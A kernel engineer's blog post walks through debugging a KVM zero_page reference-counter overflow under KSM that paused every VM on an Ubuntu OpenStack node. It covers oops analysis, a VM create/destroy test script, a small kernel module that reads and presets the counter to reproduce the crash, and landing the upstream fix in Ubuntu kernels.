Today, we are going to take a in-depth look at the problem at hand, and see how I debugged and fixed the issue, from beginning to completion.

Let’s get started.

Problem Description

The first thing to do with any problem is to understand what happened, and gather as much data as possible.

Having a look at the case, the complaint is that a OpenStack compute node running on 16.04 LTS with the Xenial-Queens cloud archive enabled suffered a failure where all virtual machines were paused at once. The node was running the 4.15 Xenial HWE kernel, so this system is more or less built with Bionic components ontop of Xenial.

The logs show various QEMU errors and a crash, as well as a kernel oops. Let’s have a look.

From syslog:

error : qemuMonitorJSONCheckError:392 : internal error: unable to execute QEMU command 'cont': Resetting the Virtual Machine is required

From QEMU Logs:

error: kvm run failed Bad address
EAX=000afe00 EBX=0000000b ECX=00000080 EDX=00000cfe
ESI=0003fe00 EDI=000afe00 EBP=00000007 ESP=00006d74
EIP=000ee344 EFL=00010002 [-------] CPL=0 II=0 A20=1 SMM=0 HLT=0
ES =0010 00000000 ffffffff 00c09300 DPL=0 DS   [-WA]
CS =0008 00000000 ffffffff 00c09b00 DPL=0 CS32 [-RA]
SS =0010 00000000 ffffffff 00c09300 DPL=0 DS   [-WA]
DS =0010 00000000 ffffffff 00c09300 DPL=0 DS   [-WA]
FS =0010 00000000 ffffffff 00c09300 DPL=0 DS   [-WA]
GS =0010 00000000 ffffffff 00c09300 DPL=0 DS   [-WA]
LDT=0000 00000000 0000ffff 00008200 DPL=0 LDT
TR =0000 00000000 0000ffff 00008b00 DPL=0 TSS32-busy
GDT=     000f7040 00000037
IDT=     000f707e 00000000
CR0=00000011 CR2=00000000 CR3=00000000 CR4=00000000
DR0=0000000000000000 DR1=0000000000000000 DR2=0000000000000000 DR3=0000000000000000 
DR6=00000000ffff0ff0 DR7=0000000000000400
EFER=0000000000000000
Code=c3 57 56 b8 00 fe 0a 00 be 00 fe 03 00 b9 80 00 00 00 89 c7 <f3> a5 a1 00 80 03 00 8b 15 04 80 03 00 a3 00 80 0a 00 89 15 04 80 0a 00 b8 ae e2 00 00 31

Finally, the kernel oops:

 [3191370.893495] WARNING: CPU: 13 PID: 48929 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
 [3191370.893552] CPU: 13 PID: 48929 Comm: CPU 0/KVM Not tainted 4.15.0-106-generic #107~16.04.1-Ubuntu
 [3191370.893552] Hardware name: Dell Inc. PowerEdge R740xd/00WGD1, BIOS 2.6.4 04/09/2020
 [3191370.893554] RIP: 0010:follow_page_pte+0x6f4/0x710
 [3191370.893555] RSP: 0018:ffffad279f7ab908 EFLAGS: 00010286
 [3191370.893556] RAX: ffffdc0fa72eba80 RBX: ffffdc0f9b1535b0 RCX: 0000000080000000
 [3191370.893556] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 800000b9cbaea225
 [3191370.893557] RBP: ffffad279f7ab970 R08: 800000b9cbaea225 R09: ffff9359857fd5f0
 [3191370.893558] R10: 0000000000000000 R11: 0000000000000000 R12: ffffdc0fa72eba80
 [3191370.893558] R13: 0000000000000326 R14: ffff935de09e19e0 R15: ffff9359857fd5f0
 [3191370.893559] FS:  00007f68757fa700(0000) GS:ffff93617ef80000(0000) knlGS:ffff964a7fc00000
 [3191370.893559] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [3191370.893560] CR2: 00007ff92ca7a000 CR3: 000000b7209d2005 CR4: 00000000007626e0
 [3191370.893561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
 [3191370.893561] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
 [3191370.893561] PKRU: 55555554
 [3191370.893562] Call Trace:
 [3191370.893565]  follow_pmd_mask+0x273/0x630
 [3191370.893567]  ? gup_pgd_range+0x23f/0xde0
 [3191370.893568]  follow_page_mask+0x178/0x230
 [3191370.893569]  __get_user_pages+0xb8/0x740
 [3191370.893571]  get_user_pages+0x42/0x50
 [3191370.893604]  __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
 [3191370.893615]  ? mmu_set_spte+0x1dd/0x3a0 [kvm]
 [3191370.893626]  try_async_pf+0x66/0x220 [kvm]
 [3191370.893635]  tdp_page_fault+0x14b/0x2b0 [kvm]
 [3191370.893640]  ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
 [3191370.893649]  kvm_mmu_page_fault+0x62/0x180 [kvm]
 [3191370.893651]  handle_ept_violation+0xbc/0x160 [kvm_intel]
 [3191370.893654]  vmx_handle_exit+0xa5/0x580 [kvm_intel]
 [3191370.893664]  vcpu_enter_guest+0x414/0x1260 [kvm]
 [3191370.893674]  kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
 [3191370.893683]  ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
 [3191370.893691]  kvm_vcpu_ioctl+0x33a/0x610 [kvm]
 [3191370.893693]  ? audit_filter_rules+0x232/0x1070
 [3191370.893696]  do_vfs_ioctl+0xa4/0x600
 [3191370.893697]  ? __audit_syscall_entry+0xac/0x100
 [3191370.893699]  ? syscall_trace_enter+0x1d6/0x2f0
 [3191370.893700]  SyS_ioctl+0x79/0x90
 [3191370.893701]  do_syscall_64+0x73/0x130
 [3191370.893704]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
 [3191370.893705] RIP: 0033:0x7f68c81b4f47
 [3191370.893706] RSP: 002b:00007f68757f98b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
 [3191370.893707] RAX: ffffffffffffffda RBX: 000000000000ae80 RCX: 00007f68c81b4f47
 [3191370.893707] RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000031
 [3191370.893708] RBP: 000055ac785ae320 R08: 000055ac77357310 R09: 00000000000000ff
 [3191370.893708] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000000000000
 [3191370.893708] R13: 00007f68cd582000 R14: 0000000000000000 R15: 000055ac785ae320
 [3191370.893709] Code: 4d 63 e6 e9 f2 fc ff ff 4c 89 45 d0 48 8b 47 10 e8 22 f0 9e 00 4c 8b 45 d0 e9 89 fc ff ff 4c 89 e7 e8 81 3f fd ff e9 aa fc ff ff <0f> 0b 49 c7 c4 f4 ff ff ff e9 c1 fc ff ff 0f 1f 40 00 66 2e 0f 

Since the kernel oops mentions a few functions in the KVM module, and we know that all VMs were paused at the same time, we are probably looking at a kernel problem and not a problem in QEMU or OpenStack.

Looking at the system time, 3191370 seconds is 36.93 days, which is quite a long time, so this fault is likely something that takes time to hit. Time to start digging.

Analysis of Kernel Oops

Looking at the call trace in the kernel oops, we see that an EPT (Extended Page Table) violation has happened, with the call to handle_ept_violation() in the kvm_intel module.

Right after that, we page fault with kvm_mmu_page_fault(), which calls tdp_page_fault().

From there, the kernel goes on a goose chase to try locate a particular page, with calls to get_user_pages(), follow_page_mask(), gup_pgd_range() and follow_pmd_mask().

We crash at follow_page_pte+0x6f4, which is mentioned in RIP.

Okay, so the next step is to read the code at follow_page_pte+0x6f4, so we download the debug kernel ddeb, for Xenial HWE, and save it to disk.

From there we can extract it, and query the file and line of code with eu-addr2line:

$ dpkg -x linux-image-unsigned-4.15.0-106-generic-dbgsym_4.15.0-106.107~16.04.1_amd64.ddeb linux
$ cd linux/usr/lib/debug/boot
$ eu-addr2line -e ./vmlinux-4.15.0-106-generic -f follow_page_pte+0x6f4
try_get_page inlined at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/mm/gup.c:156 in follow_page_pte
/build/linux-hwe-FEhT7y/linux-hwe-4.15.0/mm/gup.c:170

Okay, this is interesting. Let’s jump to mm/gup.c:156 in the 4.15 kernel source tree, and see we are in follow_page_pte():

static struct page *follow_page_pte(struct vm_area_struct *vma,
       unsigned long address, pmd_t *pmd, unsigned int flags)
{
...
   if (flags & FOLL_GET) {
       if (unlikely(!try_get_page(page))) {
           page = ERR_PTR(-ENOMEM);
           goto out;
       }
...

See the call to try_get_page()? It was actually mentioned in the eu-addr2line output, as it mentions that we are executing an inlined try_get_page().

Lets look up try_get_page(). try_get_page() is located in include/linux/mm.h:852, which is mentioned at the top of the oops message:

static inline __must_check bool try_get_page(struct page *page)
{
   page = compound_head(page);
   if (WARN_ON_ONCE(page_ref_count(page) <= 0))
       return false;
   page_ref_inc(page);
   return true;
}

if (WARN_ON_ONCE(page_ref_count(page) <= 0)) looks like a check to ensure that this page’s reference counter has not overflowed and wrapped around into negatives.

If we hit this warning and oopsed, then we must have overflowed the page’s reference counter somehow. We now need to figure out which page, and why.

Finding the Commit with the Fix

At this point, I did some searching on some mailing lists, and the upstream kernel git tree. I got lucky and came across the below commit rather quickly:

commit 7df003c85218b5f5b10a7f6418208f31e813f38f
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Sat Oct 12 11:37:31 2019 +0800
Subject: KVM: fix overflow of zero page refcount with ksm running
Link: https://github.com/torvalds/linux/commit/7df003c85218b5f5b10a7f6418208f31e813f38f 

The description mentions that the patch authors were testing starting and stopping virtual machines with Kernel Samepage Mapping (KSM) enabled on the compute node. They found a reference counter overflow on the zero_page, as the counter gets incremented in try_async_pf(), which is present in our call trace, while not being decremented in mmu_set_spte(), which is also present, while handling an EPT violation.

Kernel Samepage Mapping is a kernel feature that allows pages to be merged into each other, and is used in KVM. It allows you to overload the memory of a compute node, for example, 100GB of ram on a node with only 64GB of ram. It works by merging the “same” pages together across different virtual machines.

In this case, the problem is centred around the zero_page, which is special, as it is a reserved page. If you allocate a new virtual machine, it will allocate many new pages full of zeros. To save space, these pages aren’t actually allocated.

Instead, we use zero_page. The zero_page is a page full of zeros. For each would be newly allocated page that would be full of zeros, we simply set them to reference the zero_page. This increments the zero_page reference counter.

When the VM wants to write data to one of those pages, a EPT violation happens, and we page fault. This triggers a copy-on-write (COW) action, that allocates a new page where the data can be written to.

In this case, each time we enter try_async_pf() we increment the reference counter for the zero_page, but it never gets decremented.

The commit description also includes a kernel oops and QEMU crash log, and it very closely matches what we found in the OpenStack compute node.

Looking at the logs from the compute node, we also see that KSM is enabled on the system:

$ cat sosreport/sys/kernel/mm/ksm/run
1 

Looks like we have our root cause.

The fix itself is pretty simple:

diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 7e63a32363640..67ae2d5c37b23 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -186,6 +186,7 @@ bool kvm_is_reserved_pfn(kvm_pfn_t pfn)
 	 */
 	if (pfn_valid(pfn))
 		return PageReserved(pfn_to_page(pfn)) &&
+		       !is_zero_pfn(pfn) &&
 		       !kvm_is_zone_device_pfn(pfn);
 
 	return true;

The fix stops treating the zero_page as reserved in kvm_is_reserved_pfn() which seems to prevent the reference counter from being incremented in higher functions.

Attempting to Reproduce the Problem

At this point, I went and built a test kernel based on 4.15.0-106-generic and included the commit we found. But we now need to reproduce the problem to prove that the commit actually fixes the problem.

The commit mentions some instructions on how to reproduce the problem:

step1:
echo 10000 > /sys/kernel/pages_to_scan/pages_to_scan
echo 1 > /sys/kernel/pages_to_scan/run
echo 1 > /sys/kernel/pages_to_scan/use_zero_pages

step2:
just create several normal qemu kvm vms.
And destroy it after 10s.
Repeat this action all the time.

Okay, so it ups the number of pages to scan, enables KSM and the use_zero_pages feature. From there I need to create and destroy a bunch of virtual machines in a loop. It doesn’t sound too hard.

If we remember the OpenStack compute node’s uptime of 37 days, and that the reference counter is a signed integer, which means we would need ~2.5 billion increments to wrap the reference counter into negatives, with a 32 bit atomic_t variable.

This might take a while.

I wrote a script that uses libvirt to create and destroy virtual machines, which runs more or less forever:

#!/bin/bash

# Script to start and stop KVM virtual machines to try trigger Kernel Samepage
# Mapping zero_page reference counter overflow.
#
# Author: Matthew Ruffell <matthew.ruffell@canonical.com>
# BugLink: https://bugs.launchpad.net/bugs/1837810
#
# Fix: https://github.com/torvalds/linux/commit/7df003c85218b5f5b10a7f6418208f31e813f38f
#
# Instructions:
# ./ksm_refcnt_overflow.sh

# Install QEMU KVM if needed
sudo apt install -y qemu-kvm libvirt-bin qemu-utils genisoimage virtinst

# Enable Kernel Samepage Mapping, use zero_pages
echo 10000 | sudo tee /sys/kernel/mm/ksm/pages_to_scan
echo 1 | sudo tee /sys/kernel/mm/ksm/run
echo 1 | sudo tee /sys/kernel/mm/ksm/use_zero_pages

# Download OS image
wget https://cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-disk1.img
sudo mkdir /var/lib/libvirt/images/base
sudo mv xenial-server-cloudimg-amd64-disk1.img /var/lib/libvirt/images/base/ubuntu-16.04.qcow2

function destroy_all_vms() {
    for i in `sudo virsh list | grep running | awk '{print $2}'`
    do
        virsh shutdown $i &> /dev/null
        virsh destroy $i &> /dev/null
        virsh undefine $i &> /dev/null
        sudo rm -rf /var/lib/libvirt/images/$i
    done
}

function create_single_vm() {
    sudo mkdir /var/lib/libvirt/images/instance-$1
    sudo cp /var/lib/libvirt/images/base/ubuntu-16.04.qcow2 /var/lib/libvirt/images/instance-$1/instance-$1.qcow2
    virt-install --connect qemu:///system \
    --virt-type kvm \
    --name instance-$1 \
    --ram 1024 \
    --vcpus=1 \
    --os-type linux \
    --os-variant ubuntu16.04 \
    --disk path=/var/lib/libvirt/images/instance-$1/instance-$1.qcow2,format=qcow2 \
    --import \
    --network network=default \
    --noautoconsole &> /dev/null
}

function create_destroy_loop() {
    NUM="0"
    while true
    do
        NUM=$[$NUM + 1]
        echo "Run #$NUM"
        for i in {0..7}
        do
            create_single_vm $i
            echo "Created instance $i"
            sleep 10
        done
        sleep 30
        echo "Destroying all VMs"
        destroy_all_vms
    done
}

create_destroy_loop

You can download the script here.

The script makes sure that KSM is enabled, it installs and sets up KVM, and gets busy creating and destroying virtual machines every 10 seconds or so.

I provisioned a lab machine that was a bit more beefy than usual and started running the script.

I left the lab machine running for a few days, and I checked it every day to see if it had crashed, or if it was happily creating and destroying virtual machines.

After about 3 or 4 days I got a bit bored, and started wondering if we could see the value of the zero_page reference counter to try and see how far along we are to overflow.

I was talking to some colleagues, and one mentioned that I should be able to use crash to view live kernel memory, as long as I have the right debug kernel.

So, I installed crash and the debug kernel on the lab machine, and had a look.

Looking at the kernel source code, it seems the kernel allocated the zero_page as empty_zero_page, in arch/x86/include/asm/pgtable.h:

/*
* ZERO_PAGE is a global shared page that is always zero: used
* for zero-mapped memory areas etc..
*/
extern unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)]
   __visible;
#define ZERO_PAGE(vaddr) (virt_to_page(empty_zero_page))

We can look up the memory address of empty_zero_page with:

crash> x/gx empty_zero_page
0xffffffff9c2ec000:     0x0000000000000000

The memory address is 0xffffffff9c2ec000, and the pointer points to zero, which would be the first element of the zero page, which makes sense.

The next thing to do, is to try and get the populated struct page for empty_zero_page.

It turns out that its pretty easy in crash, we can use kmem:

crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss

      PAGE        PHYSICAL      MAPPING       INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000                0        0 3518835 17ffffc0000800 reserved

The CNT variable is the reference counter for the page struct. In this case, its only 3518835, which is pretty low. It will take months for this to reach ~2.5 billion and overflow.

In the meantime, if we run the kmem command a few more times:

crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss

      PAGE        PHYSICAL      MAPPING       INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000                0        0 3525496 17ffffc0000804 referenced,reserved
crash> kmem 0xffffffff9c2ec000
ffffffff9c2ec000 (b) .bss

      PAGE        PHYSICAL      MAPPING       INDEX CNT FLAGS
ffffd85a125e3b00 4978ec000                0        0 3546258 17ffffc0000804 referenced,reserved

We can see CNT increase from 3518835 -> 3525496 -> 3546258. It is steadily increasing, and never gets smaller. So we can see buggy behaviour, but we can’t reproduce the failure just yet.

Working Smarter and Reproducing by Writing a Kernel Module

Okay, so we need a way to be able to reproduce the problem faster than just waiting for it to happen. In this case, we are going to write a kernel module to read, and hopefully set the value of the reference counter of the zero_page.

One of my colleagues told me that I can get the page struct for the zero_page by calling virt_to_page() and passing in empty_zero_page. This is useful, as the reference counter is the _refcount member, as shown below:

If we look at include/linux/mm_types.h:

struct page {
...
       struct {

           union {
               /*
                * Count of ptes mapped in mms, to show when
                * page is mapped & limit reverse map searches.
                *
                * Extra information about page type may be
                * stored here for pages that are never mapped,
                * in which case the value MUST BE <= -2.
                * See page-flags.h for more details.
                */
               atomic_t _mapcount;

               unsigned int active;        /* SLAB */
               struct {            /* SLUB */
                   unsigned inuse:16;
                   unsigned objects:15;
                   unsigned frozen:1;
               };
               int units;          /* SLOB */
           };
           /*
            * Usage count, *USE WRAPPER FUNCTION* when manual
            * accounting. See page_ref.h
            */
           atomic_t _refcount;
       };
   };

_refcount is what we are interested in, since if we remember back to try_get_page() and its call to if (WARN_ON_ONCE(page_ref_count(page) <= 0)), we can look at the implementation of page_ref_count() in include/linux/page_ref.h:

static inline int page_ref_count(struct page *page)
{
   return atomic_read(&page->_refcount);
}

This just does a atomic_read() on page struct -> _refcount.

Good! Let’s write a kernel module which exposes a /proc interface which we can read from, to see the current value of the zero_page reference counter:

/*
 *  zero_page_refcount.c -  view zero_page reference counter in real time
 *  with the proc filesystem.
 *
 *  Author: Matthew Ruffell <matthew.ruffell@canonical.com>
 *
 * Steps:
 *
 * $ sudo apt-get -y install gcc make libelf-dev linux-headers-$(uname -r)
 *
 * cat <<EOF >Makefile
obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
EOF
 *
 * $ make
 * $ sudo insmod zero_page_refcount.ko
 * # To display current zero_page reference count:
 * $ cat /proc/zero_page_refcount
 */

#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>

#include <linux/atomic.h>
#include <asm/pgtable.h>

static int zero_page_refcount_show(struct seq_file *m, void *v) {
  struct page *page = virt_to_page(empty_zero_page);
  int reference_count = atomic_read(&page->_refcount);
  seq_printf(m, "Zero Page Refcount: 0x%x or %d\n", reference_count, reference_count);
  return 0;
}

static int zero_page_refcount_open(struct inode *inode, struct  file *file) {
  return single_open(file, zero_page_refcount_show, NULL);
}

static const struct file_operations zero_page_refcount_fops = {
  .owner = THIS_MODULE,
  .open = zero_page_refcount_open,
  .read = seq_read,
  .llseek = seq_lseek,
  .release = single_release,
};

static int __init zero_page_refcount_init(void) {
  proc_create("zero_page_refcount", 0, NULL, &zero_page_refcount_fops);
  return 0;
}

static void __exit zero_page_refcount_exit(void) {
  remove_proc_entry("zero_page_refcount", NULL);
}

MODULE_LICENSE("GPL");
module_init(zero_page_refcount_init);
module_exit(zero_page_refcount_exit);

The module is pretty simple, we register a /proc interface called /proc/zero_page_refcount, which is read-only. It calls the module function zero_page_refcount_show(), which uses virt_to_page(empty_zero_page) to get the page struct for the zero page, we do an atomic_read(&page->_refcount) to get the reference counter, and we then print it out. Easy as.

If you compile it with the following Makefile:

obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
	make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
	make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean

with:

$ make
$ sudo insmod zero_page_refcount.ko

From there we can run it with:

$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x687 or 1671

If we run it a few times, we can see it increment.

$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x687 or 1671
$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x846 or 2118
$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x9f8 or 2552
$ cat /proc/zero_page_refcount
Zero Page Refcount: 0xcb2 or 3250 

Okay, so our kernel module works. Now, we can go about writing a function to set the value of the reference counter. I just added another /proc interface, called /proc/zero_page_refcount_set which uses virt_to_page(empty_zero_page) to get the page struct, and atomic_set(&page->_refcount, 0xFFFF7FFFFF00) to set it near overflow.

The complete module is below:

/*
 *  zero_page_refcount.c -  view zero_page reference counter in real time
 *  with the proc filesystem.
 *
 *  Author: Matthew Ruffell <matthew.ruffell@canonical.com>
 *
 * Steps:
 *
 * $ sudo apt-get -y install gcc make libelf-dev linux-headers-$(uname -r)
 *
 * cat <<EOF >Makefile
obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
EOF
 *
 * $ make
 * $ sudo insmod zero_page_refcount.ko
 * # To display current zero_page reference count:
 * $ cat /proc/zero_page_refcount
 * # To set zero_page reference count to near overflow:
 * $ cat /proc/zero_page_refcount_set
 */

#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>

#include <linux/atomic.h>
#include <asm/pgtable.h>

static int zero_page_refcount_show_set(struct seq_file *m, void *v) {
  struct page *page = virt_to_page(empty_zero_page);
  atomic_set(&page->_refcount, 0xFFFF7FFFFF00);
  seq_printf(m, "Zero Page Refcount set to 0x1FFFFFFFFF000\n");
  return 0;
}

static int zero_page_refcount_open_set(struct inode *inode, struct  file *file) {
  return single_open(file, zero_page_refcount_show_set, NULL);
}

static const struct file_operations zero_page_refcount_set_fops = {
  .owner = THIS_MODULE,
  .open = zero_page_refcount_open_set,
  .read = seq_read,
  .llseek = seq_lseek,
  .release = single_release,
};

static int zero_page_refcount_show(struct seq_file *m, void *v) {
  struct page *page = virt_to_page(empty_zero_page);
  int reference_count = atomic_read(&page->_refcount);
  seq_printf(m, "Zero Page Refcount: 0x%x or %d\n", reference_count, reference_count);
  return 0;
}

static int zero_page_refcount_open(struct inode *inode, struct  file *file) {
  return single_open(file, zero_page_refcount_show, NULL);
}

static const struct file_operations zero_page_refcount_fops = {
  .owner = THIS_MODULE,
  .open = zero_page_refcount_open,
  .read = seq_read,
  .llseek = seq_lseek,
  .release = single_release,
};

static int __init zero_page_refcount_init(void) {
  proc_create("zero_page_refcount", 0, NULL, &zero_page_refcount_fops);
  proc_create("zero_page_refcount_set", 0, NULL, &zero_page_refcount_set_fops);
  return 0;
}

static void __exit zero_page_refcount_exit(void) {
  remove_proc_entry("zero_page_refcount", NULL);
  remove_proc_entry("zero_page_refcount_set", NULL);
}

MODULE_LICENSE("GPL");
module_init(zero_page_refcount_init);
module_exit(zero_page_refcount_exit);

You can download the completed module here.

This time, if we build and insert it to the running kernel, we can set the reference counter to near overflow:

$ cat /proc/zero_page_refcount_set
Zero Page Refcount set to 0x1FFFFFFFFF000 

After that, we can watch it overflow:

$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x7fffff16 or 2147483414
$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x80000000 or -2147483648 

See that? It wrapped around from 2147483414 to -2147483648! That’s a signed integer overflow.

If we check the status of our virtual machines, still running in that infinite script, we see they are now paused:

$ virsh list
Id Name State
----------------------------------------------------
1 instance-0 paused
2 instance-1 paused 

If we check dmesg, we see the exact same kernel oops:

[  167.695986] WARNING: CPU: 1 PID: 3016 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[  167.696023] CPU: 1 PID: 3016 Comm: CPU 0/KVM Tainted: G           OE    4.15.0-106-generic #107~16.04.1-Ubuntu
[  167.696023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
[  167.696025] RIP: 0010:follow_page_pte+0x6f4/0x710
[  167.696026] RSP: 0018:ffffa81802023908 EFLAGS: 00010286
[  167.696027] RAX: ffffed8786e33a80 RBX: ffffed878c6d21b0 RCX: 0000000080000000
[  167.696027] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 80000001b8cea225
[  167.696028] RBP: ffffa81802023970 R08: 80000001b8cea225 R09: ffff90c4d55fa340
[  167.696028] R10: 0000000000000000 R11: 0000000000000000 R12: ffffed8786e33a80
[  167.696029] R13: 0000000000000326 R14: ffff90c4db94fc50 R15: ffff90c4d55fa340
[  167.696030] FS:  00007f6a7798c700(0000) GS:ffff90c4edc80000(0000) knlGS:0000000000000000
[  167.696030] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  167.696031] CR2: 0000000000000000 CR3: 0000000315580002 CR4: 0000000000162ee0
[  167.696033] Call Trace:
[  167.696047]  follow_pmd_mask+0x273/0x630
[  167.696049]  follow_page_mask+0x178/0x230
[  167.696051]  __get_user_pages+0xb8/0x740
[  167.696052]  get_user_pages+0x42/0x50
[  167.696068]  __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[  167.696079]  ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[  167.696090]  try_async_pf+0x66/0x220 [kvm]
[  167.696101]  tdp_page_fault+0x14b/0x2b0 [kvm]
[  167.696104]  ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[  167.696114]  kvm_mmu_page_fault+0x62/0x180 [kvm]
[  167.696117]  handle_ept_violation+0xbc/0x160 [kvm_intel]
[  167.696119]  vmx_handle_exit+0xa5/0x580 [kvm_intel]
[  167.696129]  vcpu_enter_guest+0x414/0x1260 [kvm]
[  167.696138]  ? kvm_arch_vcpu_load+0x4d/0x280 [kvm]
[  167.696148]  kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[  167.696157]  ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[  167.696165]  kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[  167.696166]  ? do_futex+0x129/0x590
[  167.696171]  ? __switch_to+0x34c/0x4e0
[  167.696174]  ? __switch_to_asm+0x35/0x70
[  167.696176]  do_vfs_ioctl+0xa4/0x600
[  167.696177]  SyS_ioctl+0x79/0x90
[  167.696180]  ? exit_to_usermode_loop+0xa5/0xd0
[  167.696181]  do_syscall_64+0x73/0x130
[  167.696182]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  167.696184] RIP: 0033:0x7f6a80482007
[  167.696184] RSP: 002b:00007f6a7798b8b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[  167.696185] RAX: ffffffffffffffda RBX: 000000000000ae80 RCX: 00007f6a80482007
[  167.696185] RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000016
[  167.696186] RBP: 000055fe135f3240 R08: 000055fe118be530 R09: 0000000000000001
[  167.696186] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[  167.696187] R13: 00007f6a85852000 R14: 0000000000000000 R15: 000055fe135f3240
[  167.696188] Code: 4d 63 e6 e9 f2 fc ff ff 4c 89 45 d0 48 8b 47 10 e8 22 f0 9e 00 4c 8b 45 d0 e9 89 fc ff ff 4c 89 e7 e8 81 3f fd ff e9 aa fc ff ff <0f> 0b 49 c7 c4 f4 ff ff ff e9 c1 fc ff ff 0f 1f 40 00 66 2e 0f 
[  167.696200] ---[ end trace 7573f6868ea8f069 ]---

The QEMU crash is the same as well. We can reproduce the problem!

Testing the test Kernel

After that good news, I installed the test kernel which I built to the lab machine.

After rebooting and recompiling the kernel module we made, I started the script to create and destroy VMs and had a look at the reference counter:

$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
$ cat /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1 

Interesting. The fix seems to keep the reference counter glued to 1. It never changes, so it will never overflow. Looks good, it seems that the identified fix really does fix the problem. That’s reassuring.

Landing the Fix in the Kernel

As with all kernel bugs, we need to follow the Stable Release Updates procedure, and follow the special kernel specific rules.

This involves opening a launchpad bug and filling out a SRU template:

https://bugs.launchpad.net/bugs/1837810

From there, I determined that the fixes needed to be landed in the 4.15 and 5.4 Ubuntu kernels, and I prepared patches to be submitted to the Ubuntu Kernel Mailing list:

After that, the patches get reviewed by senior members of the kernel team, and require 2 acks from them before it is accepted into the next SRU cycle:

ACK 1
ACK 2

From there, the patches were applied to the 4.15 and 5.4 kernel git trees:

From there we can check what kernel versions this will be included in:

For the 4.15 kernel:

$ git log --grep "KVM: fix overflow of zero page refcount with ksm running"
commit 4047f81f064d45f9f7e1ae9cac9a000f37af714c
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date:   Mon Aug 17 11:51:54 2020 +1200

    KVM: fix overflow of zero page refcount with ksm running
$ git describe --contains 4047f81f064d45f9f7e1ae9cac9a000f37af714c
Ubuntu-4.15.0-116.117~13

and the 5.4 kernel:

$ git log --grep "KVM: fix overflow of zero page refcount with ksm running"
commit 62f890e92628903a4fa2febd854edd12a0cea63a
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date:   Mon Aug 17 11:51:54 2020 +1200

    KVM: fix overflow of zero page refcount with ksm running
$ git describe --contains 62f890e92628903a4fa2febd854edd12a0cea63a
Ubuntu-5.4.0-46.50~509

We are tagged in the 4.15.0-116-generic and 5.4.0-46-generic kernels. These should be released to -updates within a few weeks of this blog post, then everyone can get this problem fixed.

Conclusion

That is how it’s done. We looked into a failure on an OpenStack compute node which paused all of its virtual machines, and we debugged the problem down to the kernel’s zero_page reference counter overflowing them Kernel Samepage Mapping is enabled.

We did some detective work, and managed to reproduce the problem without having to wait months for it to trigger, and managed to learn about writing a kernel module to help with our debugging. Finally, we got the fix landed in the Ubuntu kernels.

I hope you enjoyed the read, and as always, feel free to contact me.

Matthew Ruffell

Everything You Wanted to Know About Kernel Livepatch in Ubuntu

2020-04-20T00:00:00+00:00

One of the more recent killer features implemented by most major Linux distros these days is the ability to patch the kernel while it is running, without the need for a reboot.

